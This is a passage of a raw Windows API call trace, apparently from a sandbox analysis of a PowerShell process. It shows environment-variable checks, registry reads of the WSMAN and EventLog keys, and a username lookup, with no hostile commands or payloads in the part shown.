(in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.494] CoTaskMemFree (pv=0x1b7400b0) [0103.495] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.495] CoTaskMemFree (pv=0x1b7400b0) [0103.495] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.495] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.495] CoTaskMemFree (pv=0x1b7400b0) [0103.498] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfd8 | out: phkResult=0x1acfd8*=0x308) returned 0x0 [0103.500] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1acedc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1aced8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1acedc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1aced8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.500] CoTaskMemFree (pv=0x0) [0103.500] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.500] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x26e210, lpcchValueName=0x1acf88, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1acf88, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0103.500] CoTaskMemFree (pv=0x26e210) [0103.500] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.500] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x26e210, lpcchValueName=0x1acf88, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1acf88, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0103.500] CoTaskMemFree (pv=0x26e210) [0103.500] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.500] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x26e210, lpcchValueName=0x1acf88, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1acf88, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0103.500] CoTaskMemFree (pv=0x26e210) [0103.500] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1acf6c, lpData=0x0, lpcbData=0x1acf68*=0x0 | out: lpType=0x1acf6c*=0x1, lpData=0x0, lpcbData=0x1acf68*=0x8) returned 0x0 [0103.501] CoTaskMemAlloc (cb=0xc) returned 0x2efdc0 [0103.501] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1acf3c, lpData=0x2efdc0, lpcbData=0x1acf38*=0x8 | out: lpType=0x1acf3c*=0x1, lpData="2.0", lpcbData=0x1acf38*=0x8) returned 0x0 [0103.501] CoTaskMemFree (pv=0x2efdc0) [0103.554] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf28 | out: phkResult=0x1acf28*=0x30c) returned 0x0 [0103.555] RegQueryInfoKeyW (in: hKey=0x30c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ace2c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ace28, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ace2c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ace28*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.555] CoTaskMemFree (pv=0x0) [0103.555] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.555] RegEnumValueW (in: hKey=0x30c, dwIndex=0x0, lpValueName=0x26e210, lpcchValueName=0x1aced8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1aced8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0103.555] CoTaskMemFree (pv=0x26e210) [0103.555] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.555] RegEnumValueW (in: hKey=0x30c, dwIndex=0x1, lpValueName=0x26e210, lpcchValueName=0x1aced8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1aced8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0103.555] CoTaskMemFree (pv=0x26e210) [0103.555] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.555] RegEnumValueW (in: hKey=0x30c, dwIndex=0x2, lpValueName=0x26e210, lpcchValueName=0x1aced8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1aced8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0 [0103.555] CoTaskMemFree (pv=0x26e210) [0103.555] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1acebc, lpData=0x0, lpcbData=0x1aceb8*=0x0 | out: lpType=0x1acebc*=0x1, lpData=0x0, lpcbData=0x1aceb8*=0x8) returned 0x0 [0103.555] CoTaskMemAlloc (cb=0xc) returned 0x2efc20 [0103.555] RegQueryValueExW (in: hKey=0x30c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1ace8c, lpData=0x2efc20, lpcbData=0x1ace88*=0x8 | out: lpType=0x1ace8c*=0x1, lpData="2.0", lpcbData=0x1ace88*=0x8) returned 0x0 [0103.555] CoTaskMemFree (pv=0x2efc20) [0103.556] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.556] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.557] CoTaskMemFree (pv=0x1b7400b0) [0103.561] CoTaskMemAlloc (cb=0x104) returned 0x1b7400b0 [0103.561] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7400b0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0103.561] CoTaskMemFree (pv=0x1b7400b0) [0103.567] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf58 | out: phkResult=0x1acf58*=0x320) returned 0x0 [0103.569] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1acecc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acec8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1acecc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1acec8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.569] CoTaskMemFree (pv=0x0) [0103.569] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.570] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x26e210, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.570] CoTaskMemFree (pv=0x26e210) [0103.570] CoTaskMemFree (pv=0x0) [0103.570] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.570] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x26e210, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.570] CoTaskMemFree (pv=0x26e210) [0103.570] CoTaskMemFree (pv=0x0) [0103.570] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.570] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x26e210, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.570] CoTaskMemFree (pv=0x26e210) [0103.570] CoTaskMemFree (pv=0x0) [0103.570] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.570] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x26e210, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.570] CoTaskMemFree (pv=0x26e210) [0103.570] CoTaskMemFree (pv=0x0) [0103.570] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.570] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x26e210, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.570] CoTaskMemFree (pv=0x26e210) [0103.570] CoTaskMemFree (pv=0x0) [0103.570] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.570] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x26e210, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.570] CoTaskMemFree (pv=0x26e210) [0103.570] CoTaskMemFree (pv=0x0) [0103.570] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.570] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x26e210, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.571] CoTaskMemFree (pv=0x26e210) [0103.571] CoTaskMemFree (pv=0x0) [0103.571] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.571] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x26e210, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.571] CoTaskMemFree (pv=0x26e210) [0103.571] CoTaskMemFree (pv=0x0) [0103.571] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.571] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x26e210, lpcchName=0x1acf58, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1acf58, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.571] CoTaskMemFree (pv=0x26e210) [0103.571] CoTaskMemFree (pv=0x0) [0103.571] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x330) returned 0x0 [0103.571] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2 [0103.571] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x334) returned 0x0 [0103.571] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2 [0103.571] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x338) returned 0x0 [0103.571] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2 [0103.571] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x33c) returned 0x0 [0103.572] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2 [0103.572] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x340) returned 0x0 [0103.572] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2 [0103.572] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x344) returned 0x0 [0103.572] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2 [0103.572] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x348) returned 0x0 [0103.572] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2 [0103.572] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x34c) returned 0x0 [0103.572] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x0) returned 0x2 [0103.572] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x350) returned 0x0 [0103.573] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acfb8 | out: phkResult=0x1acfb8*=0x354) returned 0x0 [0103.573] RegCloseKey (hKey=0x354) returned 0x0 [0103.573] RegCloseKey (hKey=0x320) returned 0x0 [0103.573] RegCloseKey (hKey=0x350) returned 0x0 [0103.581] CoTaskMemAlloc (cb=0x804) returned 0x1f1320 [0103.581] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1f1320, nSize=0x1ad1c8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1ad1c8) returned 0x1 [0103.582] CoTaskMemFree (pv=0x1f1320) [0103.583] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.583] GetUserNameW (in: lpBuffer=0x26e210, pcbBuffer=0x1ad208 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1ad208) returned 1 [0103.584] CoTaskMemFree (pv=0x26e210) [0103.658] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf08 | out: phkResult=0x1acf08*=0x358) returned 0x0 [0103.658] RegQueryInfoKeyW (in: hKey=0x358, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ace7c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ace78, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ace7c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ace78*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.658] CoTaskMemFree (pv=0x0) [0103.658] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.658] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x0, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.658] CoTaskMemFree (pv=0x26e210) [0103.658] CoTaskMemFree (pv=0x0) [0103.658] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.658] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x1, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.658] CoTaskMemFree (pv=0x26e210) [0103.658] CoTaskMemFree (pv=0x0) [0103.658] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.658] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x2, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.658] CoTaskMemFree (pv=0x26e210) [0103.658] CoTaskMemFree (pv=0x0) [0103.658] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.658] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x3, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.659] CoTaskMemFree (pv=0x26e210) [0103.659] CoTaskMemFree (pv=0x0) [0103.659] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.659] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x4, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.659] CoTaskMemFree (pv=0x26e210) [0103.659] CoTaskMemFree (pv=0x0) [0103.659] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.659] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x5, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.659] CoTaskMemFree (pv=0x26e210) [0103.659] CoTaskMemFree (pv=0x0) [0103.659] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.659] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x6, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.659] CoTaskMemFree (pv=0x26e210) [0103.659] CoTaskMemFree (pv=0x0) [0103.659] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.659] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x7, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.659] CoTaskMemFree (pv=0x26e210) [0103.659] CoTaskMemFree (pv=0x0) [0103.659] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.659] RegEnumKeyExW (in: hKey=0x358, dwIndex=0x8, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.659] CoTaskMemFree (pv=0x26e210) [0103.659] CoTaskMemFree (pv=0x0) [0103.659] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x35c) returned 0x0 [0103.660] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.660] RegOpenKeyExW (in: hKey=0x358, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x360) returned 0x0 [0103.660] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.660] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x364) returned 0x0 [0103.660] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.660] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x368) returned 0x0 [0103.660] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.660] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x36c) returned 0x0 [0103.660] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.661] RegOpenKeyExW (in: hKey=0x358, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x370) returned 0x0 [0103.661] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.661] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x374) returned 0x0 [0103.661] RegOpenKeyExW (in: hKey=0x374, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.661] RegOpenKeyExW (in: hKey=0x358, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x378) returned 0x0 [0103.661] RegOpenKeyExW (in: hKey=0x378, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x0) returned 0x2 [0103.661] RegOpenKeyExW (in: hKey=0x358, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x37c) returned 0x0 [0103.661] RegOpenKeyExW (in: hKey=0x37c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf68 | out: phkResult=0x1acf68*=0x380) returned 0x0 [0103.661] RegCloseKey (hKey=0x380) returned 0x0 [0103.661] RegCloseKey (hKey=0x358) returned 0x0 [0103.662] RegCloseKey (hKey=0x37c) returned 0x0 [0103.663] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acf08 | out: phkResult=0x1acf08*=0x37c) returned 0x0 [0103.663] RegQueryInfoKeyW (in: hKey=0x37c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1ace7c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ace78, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1ace7c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1ace78*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.663] CoTaskMemFree (pv=0x0) [0103.663] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.663] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x0, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.663] CoTaskMemFree (pv=0x26e210) [0103.663] CoTaskMemFree (pv=0x0) [0103.663] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.663] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x1, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.663] CoTaskMemFree (pv=0x26e210) [0103.663] CoTaskMemFree (pv=0x0) [0103.663] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.663] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x2, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.663] CoTaskMemFree (pv=0x26e210) [0103.663] CoTaskMemFree (pv=0x0) [0103.663] CoTaskMemAlloc (cb=0x204) returned 0x26e210 [0103.664] RegEnumKeyExW (in: hKey=0x37c, dwIndex=0x3, lpName=0x26e210, lpcchName=0x1acf08, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1acf08, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.664] CoTaskMemFree (pv=0x26e210) [0103.664] CoTaskMemFree (pv=0x0) [0103.664] CoTaskMemAlloc 